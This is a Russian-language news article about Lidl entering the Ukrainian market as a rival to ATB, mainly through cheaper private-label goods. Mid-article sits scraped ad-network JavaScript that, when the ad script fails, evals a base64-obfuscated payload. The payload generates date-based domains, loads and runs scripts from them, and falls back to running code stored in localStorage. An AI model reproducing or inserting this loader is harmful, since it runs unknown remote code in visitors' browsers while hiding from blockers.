В ближайшее время на украинский рынок выйдет европейская сеть супермаркетов, которая может стать ключевым конкурентом АТБ.
Об этом информирует портал Акцент.
Как пишет Сегодня, первый фактор, который заставит людей посетить Lidl, – это любопытство. Действительно, сеть завоевала популярность и признание во всем мире, о ней говорят чуть ли не с каждым СМИ у нас в Украине. Так что, как говорится, украинцы отправятся «на проверку».
Lidl в Польше
Как рассказала гендиректор сети Metro Украина Елена Вдовиченко в комментарии GSMinfo, рынок ритейла в Украине относительно свободен, поэтому Lidl будет что предложить потребителям. Ведь у компании есть собственный импорт и товарные марки.
Поэтому украинцев привлечет:
больший выбор товаров (в том числе известных национальных брендов). В Lidl есть около 2 тысяч уникальных продуктов, но поскольку супермаркеты невелики, то этого количества мало;уникальные фреш-категории (собственное производство кулинарии, выпечки, кондитерских изделий, копченостей, фаст-фуда и т.п.);качественные собственные и импортные товары. Преимущества сети
Ранее Акцент писал, что стало известно о главных преимуществах супермаркетов Lidl, которые могут стать ключевыми конкурентами АТБ. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Дело в том, что с приходом «немцев» АТБ потеряет свое главное конкурентное преимущество – относительную дешевизну товаров. У новой сети все будет дешевле за счет реализации товаров собственной торговой марки (СТМ).
О преимуществах СТМ рассказал генеральный директор инвестиционной группы VolWest Group Роман Корсак.
По словам Корсака, товары СТМ – главное конкурентное преимущество этой сети. Они составляют около 65% всего ассортимента товаров, которыми торгуют супермаркеты Lidl.
В АТБ также представлено немало наименований СТМ, однако они составляют всего четверть ассортимента этой торговой сети.
В чем преимущество СТМ?
При реализации товаров собственной торговой марки продавец работает без посредников. К тому же, он может ставить на свой товар такую наценку и продавать его по такой цене, которую выберет сам. В этом основное преимущество супермаркетов-дискаунтеров (дискаунтер – магазин, торгующий большим ассортиментом товаров по низким ценам) Lidl. (adsbygoogle = window.adsbygoogle || []).push({});
Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/nazvany-prichiny-populyarnosti-glavnogo-konkurenta-atb-pochemu-ukraintsy-pojdut-v-lidl/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook